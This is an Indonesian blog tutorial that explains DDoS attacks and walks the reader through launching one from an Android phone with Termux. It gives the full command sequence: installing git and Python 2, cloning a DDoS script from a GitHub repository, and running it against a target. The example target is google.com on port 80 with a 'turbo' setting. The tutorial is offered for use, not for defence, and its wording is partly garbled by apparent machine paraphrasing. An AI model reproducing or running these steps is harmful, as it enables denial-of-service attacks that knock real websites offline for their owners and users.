Tutorial DDOS Atack Web Menggunakan TERMUX

Termux Tutorial DDOS Atack Web Menggunakan TERMUX

Candil Kfb - DDOS Attack Website di Termux , DDOs sendiri merupakan serangan untuk menyerang server atau sistem jaringan untuk menciptakan down sehingga server tersebut tidak sanggup di kanal , tapi kita biasanya ddos memakai perangkat laptop tapi sedikit ribet oleh lantaran itu saya akan memperlihatkan Tutorial Cara DDOS Attack Website dengan Termux di Android.

ddos attack termux


kelemahan ddos ialah kita menghabiskan kouta banyak untuk menciptakan sistem atau server sanggup down , dan harus dilakukan oleh banyak orang oleh lantaran itu banyak para ddos yang melaksanakan serangan ddos tidak sendirian untuk sanggup menciptakan sistem atau server sanggup down ( Tidak sanggup Diakses).

Sistem Kerja dari DDOs termux sendiri ialah mengirim Request berupa file dengan aplikasi termux dan dikirim ke Server tujuan , hal ini dilakukan secara banyak dan bersamaan sehingga server tidak sanggup menampung banyak nya jumlah request yang masuk, sehingga akan menciptakan server kelebihan beban sehingga akan menciptakan server tersebut down dan tidak sanggup di kanal kembali

Dengan mengirim data DDOS ke Website dengan memakai Aplikasi termux secara bersamaan , niscaya server pun akan kelebihan beban dikala mendapatkan undangan dan pada kesudahannya server pun akan mengalami Over Load dan menjadikan server down.

Apa Itu DDOS Atack ?

DDoS abreviasi dari (Distributed Denial of Service) atau disebut dengan Penolakan Layanan secara Terdistribusi.  Aktivitas DDoS Termux ialah jenis serangan yang dilakukan untuk mengirim request dan file tertetu ke kemudian lintas jaringan internet pada server, sistem, atau jaringan.

Umumnya serangan Dddos dilakukan memakai beberapa komputer host penyerang ( banyak pengguna ) sehingga server tidak sanggup di kanal lantaran kelebihan beban request , DDoS mempunyai konsep yang sangat sederhana, yaitu menciptakan kemudian lintas server berjalan dengan beban yang berat hingga tidak sanggup lagi menampung koneksi dari user lain (overload)

kalau kita memakai aplikasi termux merupakan jenis serangan ddos lewat aplikasi dengan mengirim request ke server lain 

Tutorial DDOS Atack Web Menggunakan TERMUX

Dengan memakai aplikasi termux di android kita tidak memerlukan kanal Root untuk menjalankan Attack Ddos tersebut , oleh lantaran itu saya lebih suka memakai aplikasi termux untuk ddos lewat smartphone android , untuk tutorial selengkapnya ibarat di bawah ini
buka aplikasi Termux 
kemudian ketik perintah ibarat di bawah ini :
pkg update && pkg upgrade

kalau anda belum install package python dan git install dulu dengan ketik arahan perintah ibarat di bawah ini

pkg install git -y

pkg install python2 -y 

kita perlu d0wnl0ad script ddos terlebih dahulu dengan cara masukan arahan perintah ibarat di bawah ini

git clone https://github.com/kumpulanremaja/ddos2  

sesudah itu kita menjalankan script ddos di termux dengan perintah di bawah ini

 cd ddos2 

 python2 ddos.py  Alamat Ip -p  -t

Contohnya ibarat anda ingin menyerang situs google,com maka arahan perintahnya ibarat di bawah ini

python2 ddos.py google.com 80  135  

Dengan Keterangan Perintah Ddos ibarat di bawah ini

 -s ( Server Ip )

 -h ( Bantuan )

 -p ( Port )

 -t ( Turbo ) 

Selesai kita tunggu hingga hingga proses berakhir, kalau anda ingin memperhentikan proses ini ketik arahan perintah CTRL + C untuk berhentikan proses ddos di termux.

Penutup :

Cukup Sekian Tutorial Cara DDOS Attack Website dengan Termux dengan gampang cepat dan simple , kekurangan serangan ini ialah membuang kouta kita dengan percuma , saya sarankan gunakan lah wifi Agar gak boros kouta. Semoga Bermanfaat, Selamat Berexperimen.

  • Deskripsi

    Candil Kfb - DDOS Attack Website di Termux , DDOs sendiri merupakan serangan untuk menyerang server atau sistem jaringan untuk menciptakan down sehing
  • Tag

    Termux Tutorial